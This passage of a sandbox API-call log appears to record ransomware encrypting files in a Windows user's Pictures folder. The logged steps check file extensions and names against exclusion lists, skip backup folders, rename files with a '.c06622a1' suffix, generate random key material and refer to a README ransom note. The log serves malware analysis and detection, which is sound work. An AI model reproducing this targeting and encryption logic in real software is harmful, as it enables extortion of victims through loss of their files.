[0167.903] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0167.903] wcslen (_String="msstyles") returned 0x8 [0167.903] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0167.904] wcslen (_String="msu") returned 0x3 [0167.904] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0167.904] wcslen (_String="nls") returned 0x3 [0167.904] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0167.904] wcslen (_String="nomedia") returned 0x7 [0167.904] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0167.904] wcslen (_String="ocx") returned 0x3 [0167.904] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0167.904] wcslen (_String="prf") returned 0x3 [0167.904] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0167.904] wcslen (_String="ps1") returned 0x3 [0167.904] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0167.904] wcslen (_String="rom") returned 0x3 [0167.904] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0167.904] wcslen (_String="rtp") returned 0x3 [0167.904] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0167.904] wcslen (_String="scr") returned 0x3 [0167.904] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0167.904] wcslen (_String="shs") returned 0x3 [0167.904] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0167.904] wcslen (_String="spl") returned 0x3 [0167.904] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0167.904] wcslen (_String="sys") returned 0x3 [0167.904] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0167.904] wcslen (_String="theme") returned 0x5 [0167.904] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0167.904] wcslen (_String="themepack") returned 0x9 [0167.905] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0167.905] wcslen (_String="wpx") returned 0x3 [0167.905] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0167.905] wcslen (_String="lock") returned 0x4 [0167.905] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0167.905] wcslen (_String="key") returned 0x3 [0167.905] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0167.905] wcslen (_String="hta") returned 0x3 [0167.905] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0167.905] wcslen (_String="msi") returned 0x3 [0167.905] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0167.905] wcslen (_String="pdb") returned 0x3 [0167.905] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0167.905] wcslen (_String="sqlite") returned 0x6 [0167.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg")) returned 0x10 [0167.905] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0167.905] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" [0167.905] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg") returned 0x3c [0167.905] wcscpy (in: _Dest=0x32400da, _Source="X8yu.png" | out: _Dest="X8yu.png") returned="X8yu.png" [0167.905] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png", dwFileAttributes=0x80) returned 1 [0167.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\x8yu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.906] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.906] ReadFile (in: hFile=0x1a8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.907] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xbacb037f [0167.907] RtlComputeCrc32 (PartialCrc=0x37f, Buffer=0x32e9a4, Length=0x80) returned 0x40979eaa [0167.907] RtlComputeCrc32 (PartialCrc=0x9eaa, Buffer=0x32e9a4, Length=0x80) returned 0xe509cbd1 [0167.907] RtlComputeCrc32 (PartialCrc=0xcbd1, Buffer=0x32e9a4, Length=0x80) returned 0x8523c74c [0167.907] RtlComputeCrc32 (PartialCrc=0xc74c, Buffer=0x32e9a4, Length=0x80) returned 0x35872c58 [0167.907] CloseHandle (hObject=0x1a8) returned 1 [0167.907] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.907] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png" [0167.907] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png") returned 0x45 [0167.907] wcscpy (in: _Dest=0x32500f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.907] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\x8yu.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\x8yu.png.c06622a1"), dwFlags=0x8) returned 1 [0167.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\X8yu.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\x8yu.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0167.910] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.910] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3c20020 [0167.919] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63cf54d8 [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x608216b5 [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37fb664f [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d5714e [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f19fac4 [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ae00144 [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x222a9543 [0167.920] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x216f44b7 [0167.923] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3c20094, Length=0x80) returned 0x3a818aa [0167.923] RtlComputeCrc32 (PartialCrc=0x18aa, Buffer=0x3c20094, Length=0x80) returned 0x7a510441 [0167.923] RtlComputeCrc32 (PartialCrc=0x441, Buffer=0x3c20094, Length=0x80) returned 0x8f9a4d66 [0167.923] RtlComputeCrc32 (PartialCrc=0x4d66, Buffer=0x3c20094, Length=0x80) returned 0x2e423021 [0167.923] RtlComputeCrc32 (PartialCrc=0x3021, Buffer=0x3c20094, Length=0x80) returned 0x4fef5e61 [0167.923] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c20020) returned 1 [0167.923] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0167.923] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.923] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.923] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0167.924] _wcsicmp (_Str1="backup", _Str2="YiCZnZd3WoEZPYnVg") returned -23 [0167.924] wcslen (_String="backup") returned 0x6 [0167.924] _wcsicmp (_Str1="bak", _Str2="YiCZnZd3WoEZPYnVg") returned -23 [0167.924] wcslen (_String="bak") returned 0x3 [0167.924] _wcsicmp (_Str1="back", _Str2="YiCZnZd3WoEZPYnVg") returned -23 [0167.924] wcslen (_String="back") returned 0x4 [0167.924] _wcsicmp (_Str1="archive", _Str2="YiCZnZd3WoEZPYnVg") returned -24 [0167.924] wcslen (_String="archive") returned 0x7 [0167.924] _wcsicmp (_Str1="bckp", _Str2="YiCZnZd3WoEZPYnVg") returned -23 [0167.924] wcslen (_String="bckp") returned 0x4 [0167.924] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.925] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0167.926] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3c080, ftCreationTime.dwHighDateTime=0x1d5e01b, ftLastAccessTime.dwLowDateTime=0x90b642f0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x90b642f0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x16716, dwReserved0=0x0, dwReserved1=0x0, cFileName="_cIOWlZbKNbSyFH_z1b.jpg", cAlternateFileName="_CIOWL~1.JPG")) returned 1 [0167.926] _wcsicmp (_Str1="_cIOWlZbKNbSyFH_z1b.jpg", _Str2="README.c06622a1.TXT") returned -19 [0167.926] wcsstr (_Str="_cIOWlZbKNbSyFH_z1b.jpg", _SubStr="README") returned 0x0 [0167.926] _wcsicmp (_Str1="autorun.inf", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 2 [0167.926] wcslen (_String="autorun.inf") returned 0xb [0167.926] _wcsicmp (_Str1="boot.ini", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 3 [0167.926] wcslen (_String="boot.ini") returned 0x8 [0167.926] _wcsicmp (_Str1="bootfont.bin", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 3 [0167.926] wcslen (_String="bootfont.bin") returned 0xc [0167.926] _wcsicmp (_Str1="bootsect.bak", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 3 [0167.926] wcslen (_String="bootsect.bak") returned 0xc [0167.926] _wcsicmp (_Str1="desktop.ini", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 5 [0167.926] wcslen (_String="desktop.ini") returned 0xb [0167.927] _wcsicmp (_Str1="iconcache.db", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 10 [0167.927] wcslen (_String="iconcache.db") returned 0xc [0167.927] _wcsicmp (_Str1="ntldr", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 15 [0167.927] wcslen (_String="ntldr") returned 0x5 [0167.927] _wcsicmp (_Str1="ntuser.dat", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 15 [0167.927] wcslen (_String="ntuser.dat") returned 0xa [0167.927] _wcsicmp (_Str1="ntuser.dat.log", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 15 [0167.927] wcslen (_String="ntuser.dat.log") returned 0xe [0167.927] _wcsicmp (_Str1="ntuser.ini", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 15 [0167.927] wcslen (_String="ntuser.ini") returned 0xa [0167.927] _wcsicmp (_Str1="thumbs.db", _Str2="_cIOWlZbKNbSyFH_z1b.jpg") returned 21 [0167.927] wcslen (_String="thumbs.db") returned 0x9 [0167.927] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.927] wcslen (_String="386") returned 0x3 [0167.927] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.927] wcslen (_String="adv") returned 0x3 [0167.927] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.927] wcslen (_String="ani") returned 0x3 [0167.927] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.927] wcslen (_String="bat") returned 0x3 [0167.927] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.927] wcslen (_String="bin") returned 0x3 [0167.927] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.927] wcslen (_String="cab") returned 0x3 [0167.928] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.928] wcslen (_String="cmd") returned 0x3 [0167.928] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.928] wcslen (_String="com") returned 0x3 [0167.928] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.928] wcslen (_String="cpl") returned 0x3 [0167.928] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.928] wcslen (_String="cur") returned 0x3 [0167.928] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.928] wcslen (_String="deskthemepack") returned 0xd [0167.928] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.928] wcslen (_String="diagcab") returned 0x7 [0167.928] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.928] wcslen (_String="diagcfg") returned 0x7 [0167.928] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.928] wcslen (_String="diagpkg") returned 0x7 [0167.928] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.928] wcslen (_String="dll") returned 0x3 [0167.928] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.928] wcslen (_String="drv") returned 0x3 [0167.928] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.928] wcslen (_String="exe") returned 0x3 [0167.928] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.928] wcslen (_String="hlp") returned 0x3 [0167.928] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.928] wcslen (_String="icl") returned 0x3 [0167.929] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.929] wcslen (_String="icns") returned 0x4 [0167.929] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.929] wcslen (_String="ico") returned 0x3 [0167.929] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.929] wcslen (_String="ics") returned 0x3 [0167.929] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.929] wcslen (_String="idx") returned 0x3 [0167.929] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.929] wcslen (_String="ldf") returned 0x3 [0167.929] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.929] wcslen (_String="lnk") returned 0x3 [0167.929] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.929] wcslen (_String="mod") returned 0x3 [0167.929] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.929] wcslen (_String="mpa") returned 0x3 [0167.929] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.929] wcslen (_String="msc") returned 0x3 [0167.929] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.929] wcslen (_String="msp") returned 0x3 [0167.929] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.929] wcslen (_String="msstyles") returned 0x8 [0167.929] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.929] wcslen (_String="msu") returned 0x3 [0167.929] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.930] wcslen (_String="nls") returned 0x3 [0167.930] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.930] wcslen (_String="nomedia") returned 0x7 [0167.930] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.930] wcslen (_String="ocx") returned 0x3 [0167.930] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.930] wcslen (_String="prf") returned 0x3 [0167.930] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.930] wcslen (_String="ps1") returned 0x3 [0167.930] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.930] wcslen (_String="rom") returned 0x3 [0167.930] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.930] wcslen (_String="rtp") returned 0x3 [0167.930] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.930] wcslen (_String="scr") returned 0x3 [0167.930] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.930] wcslen (_String="shs") returned 0x3 [0167.930] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.930] wcslen (_String="spl") returned 0x3 [0167.930] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.930] wcslen (_String="sys") returned 0x3 [0167.930] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.930] wcslen (_String="theme") returned 0x5 [0167.930] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.930] wcslen (_String="themepack") returned 0x9 [0167.930] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.931] wcslen (_String="wpx") returned 0x3 [0167.931] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.931] wcslen (_String="lock") returned 0x4 [0167.931] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.931] wcslen (_String="key") returned 0x3 [0167.931] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.931] wcslen (_String="hta") returned 0x3 [0167.931] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.931] wcslen (_String="msi") returned 0x3 [0167.931] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.931] wcslen (_String="pdb") returned 0x3 [0167.931] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.931] wcslen (_String="sqlite") returned 0x6 [0167.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0167.931] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.932] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0167.932] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0167.932] wcscpy (in: _Dest=0x348009e, _Source="_cIOWlZbKNbSyFH_z1b.jpg" | out: _Dest="_cIOWlZbKNbSyFH_z1b.jpg") returned="_cIOWlZbKNbSyFH_z1b.jpg" [0167.932] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg", dwFileAttributes=0x80) returned 1 [0167.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_ciowlzbknbsyfh_z1b.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0167.932] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.932] ReadFile (in: hFile=0x1c4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0167.934] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xe425638d [0167.934] RtlComputeCrc32 (PartialCrc=0x638d, Buffer=0x32ec24, Length=0x80) returned 0x4a5cdb69 [0167.934] RtlComputeCrc32 (PartialCrc=0xdb69, Buffer=0x32ec24, Length=0x80) returned 0xec40ac69 [0167.934] RtlComputeCrc32 (PartialCrc=0xac69, Buffer=0x32ec24, Length=0x80) returned 0xa4233f10 [0167.934] RtlComputeCrc32 (PartialCrc=0x3f10, Buffer=0x32ec24, Length=0x80) returned 0x31ef9760 [0167.934] CloseHandle (hObject=0x1c4) returned 1 [0167.934] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0167.934] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg" [0167.934] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg") returned 0x42 [0167.934] wcscpy (in: _Dest=0x32200d4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.934] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_ciowlzbknbsyfh_z1b.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_ciowlzbknbsyfh_z1b.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_cIOWlZbKNbSyFH_z1b.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_ciowlzbknbsyfh_z1b.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c4 [0167.937] CreateIoCompletionPort (FileHandle=0x1c4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.937] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3cb0020 [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b02cb8 [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48384f8 [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a3e0427 [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x300ff01a [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5415fc7c [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x35c6fbb0 [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c9dbb0f [0167.946] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11378000 [0167.949] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3cb0094, Length=0x80) returned 0x6221214 [0167.950] RtlComputeCrc32 (PartialCrc=0x1214, Buffer=0x3cb0094, Length=0x80) returned 0xed45efd9 [0167.950] RtlComputeCrc32 (PartialCrc=0xefd9, Buffer=0x3cb0094, Length=0x80) returned 0x8b83495f [0167.950] RtlComputeCrc32 (PartialCrc=0x495f, Buffer=0x3cb0094, Length=0x80) returned 0x97f3cae4 [0167.950] RtlComputeCrc32 (PartialCrc=0xcae4, Buffer=0x3cb0094, Length=0x80) returned 0xfdea3c83 [0167.950] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cb0020) returned 1 [0167.950] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.951] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0167.951] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.951] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0167.952] _wcsicmp (_Str1="backup", _Str2="Pictures") returned -14 [0167.952] wcslen (_String="backup") returned 0x6 [0167.952] _wcsicmp (_Str1="bak", _Str2="Pictures") returned -14 [0167.952] wcslen (_String="bak") returned 0x3 [0167.952] _wcsicmp (_Str1="back", _Str2="Pictures") returned -14 [0167.952] wcslen (_String="back") returned 0x4 [0167.952] _wcsicmp (_Str1="archive", _Str2="Pictures") returned -15 [0167.952] wcslen (_String="archive") returned 0x7 [0167.952] _wcsicmp (_Str1="bckp", _Str2="Pictures") returned -14 [0167.952] wcslen (_String="bckp") returned 0x4 [0167.952] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0167.953] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0167.954] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0167.954] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a592760, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8a592760, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a592760, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, 